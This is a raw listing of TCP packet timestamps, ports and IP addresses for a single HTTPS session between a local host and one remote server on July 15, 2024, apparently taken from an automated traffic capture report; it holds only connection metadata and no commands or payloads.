Jul 15, 2024 06:11:14.990736961 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.990761042 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.990778923 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.039017916 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.039046049 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.039226055 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.039294004 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.039364100 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.039518118 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.039537907 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.039608955 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.039623022 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.039680004 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.040138006 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.040158033 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.040200949 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.040224075 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.040251970 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.040278912 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.040690899 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.040712118 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.040766954 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.040780067 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.040808916 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.040828943 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.041050911 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.041070938 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.041124105 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.041135073 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.041161060 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.041178942 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.041397095 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.041424990 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.041479111 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.041491985 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.041517973 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.041541100 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.087057114 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.087130070 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.087171078 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.087223053 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.087248087 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.087264061 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.087295055 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.087351084 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.087366104 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.087373972 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.087404013 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.087421894 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.125936985 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126000881 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126039028 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126079082 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126099110 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126122952 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126198053 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126250029 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126266003 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126274109 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126305103 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126322031 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126393080 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126440048 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126473904 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126480103 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126504898 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126530886 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126655102 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126722097 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.126766920 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.126823902 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.127110958 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.127160072 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.127172947 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.127190113 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.127223015 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.127250910 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.127657890 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.127706051 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.127758980 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.127768040 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.127810955 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.174174070 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.174237967 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.174324036 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.174400091 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.174433947 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.174470901 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.174494028 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.213120937 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.213156939 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.213259935 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.213295937 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.213485956 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.213514090 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.213633060 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.213634014 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.213644028 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.213953018 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.213973045 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214001894 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.214010000 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214034081 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.214412928 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214437008 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214471102 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.214477062 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214500904 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.214829922 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214868069 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214899063 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.214905977 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.214934111 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.215107918 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.215157032 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.215172052 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.215188980 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.215225935 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.261298895 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.261359930 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.261460066 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.261498928 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.261519909 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.261523008 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.261584997 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.261589050 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.261621952 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.261657953 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.300205946 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300241947 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300298929 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.300331116 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300348043 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300374985 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300471067 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.300471067 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.300471067 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.300492048 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300781965 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300826073 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300847054 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.300858021 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.300899982 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.301198006 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301251888 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301271915 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.301280022 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301305056 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.301629066 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301687956 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301692963 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.301719904 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301752090 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.301913977 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301954985 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.301974058 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.301984072 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.302009106 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.348417044 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.348458052 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.348534107 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.348553896 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.348576069 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.348608017 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.348627090 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.348651886 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.348680019 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387239933 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387311935 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387413979 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387456894 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387476921 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387494087 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387550116 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387567043 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387590885 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387625933 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387661934 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387754917 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387811899 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387837887 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387846947 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.387878895 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.387896061 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.388057947 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.388118029 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.388163090 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.388169050 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.388194084 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.388209105 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.388513088 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.388561964 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.388586044 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.388592005 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.388616085 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.388633966 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.389240026 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.389358044 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.389384031 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.389467955 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.436079025 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.436144114 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.436244011 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.436254025 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.436284065 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.436284065 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.436314106 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.436341047 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.436342001 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.436367035 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.436397076 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.436408997 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.509907961 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.509984970 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510020971 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510066032 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510086060 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510107040 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510164022 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510215044 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510227919 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510236979 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510266066 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510283947 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510536909 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510590076 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510607004 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510617971 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510648012 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510663033 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510842085 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510894060 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510909081 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510919094 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.510947943 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.510963917 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.511600971 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.511643887 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.511701107 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.511717081 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.511737108 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.511759043 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.511850119 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.511895895 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.511919022 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.511928082 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.511965990 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.511986017 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.524218082 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.524291039 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.524319887 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.524353981 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.524374008 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.524394035 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.524425983 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.524472952 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.524502039 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.524535894 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.524542093 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.524574995 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.596858978 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.596923113 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597023964 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597065926 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597103119 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597105026 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597120047 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597140074 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597167015 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597188950 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597189903 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597213030 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597244978 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597269058 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597387075 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597446918 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597464085 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597472906 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597511053 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597528934 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597862005 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597915888 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597942114 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597949028 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.597975016 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.597990990 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.598615885 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.598686934 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.598705053 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.598715067 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.598737001 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.598754883 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.598859072 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.598901033 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.598932028 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.598938942 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.598994970 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.599013090 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.610682011 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.610750914 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.610812902 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.610841036 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.610857964 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.610879898 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.610964060 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.611016035 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.611037970 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.611043930 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.611068964 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.611088991 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.683542013 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.683579922 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.683639050 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.683676004 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.683695078 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.683718920 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.684113979 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.684145927 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.684175014 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.684180021 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.684205055 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.684221029 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.684381008 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.684406042 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.684436083 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.684442043 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.684489965 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.684504986 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685010910 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685041904 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685069084 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685076952 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685101032 CEST	49727	443	192.168.2.5	185.149.100.242
